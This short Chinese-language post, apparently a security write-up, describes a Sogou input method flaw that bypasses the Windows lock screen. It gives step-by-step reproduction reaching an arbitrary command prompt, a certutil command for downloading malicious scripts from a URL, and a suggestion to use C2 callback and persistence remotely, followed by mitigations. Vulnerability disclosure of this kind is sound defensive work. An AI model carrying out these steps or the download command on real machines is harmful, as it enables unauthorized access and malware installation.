1.在Windows锁屏状态下,可绕过系统登录密码,调用cmd执行任意命令2.要求该主机处于联网状态3.win10、win11均受其影响
贰漏洞复现
搜狗输入法0day1.Windows处于锁屏状态下,切换至搜狗输入法,调出屏幕键盘2.拖动屏幕键盘两次或者右击直至出现搜狗输入法状态栏,单击搜狗输入法菜单,进入游戏中心(未安装时需要进行初始化)3.点击登录,选择QQ登录,选择QQ手机版,进入QQ官网首页,进行下载4.此时弹出下载另存为对话框,即可在Windows搜索框输入cmd进入命令行执行命令,若权限不足可右击以管理员权限运行5.此时可执行任意与登录后无异的命令,甚至可下载恶意脚本文件:certutil -urlcache -split -f URL/fileName
叁总结1.近源攻击更好用,如果远端,可以考虑下载恶意脚本进行C2上线&权限维持2.缓解措施:暂时隐藏搜狗输入法状态栏
个人终端请关闭mstsc远程连接,服务器资产请修改远程链接默认端口3389或卸载搜狗输入法
2.访问搜狗官网下载时,请务必注意钓鱼网站
评论 (0)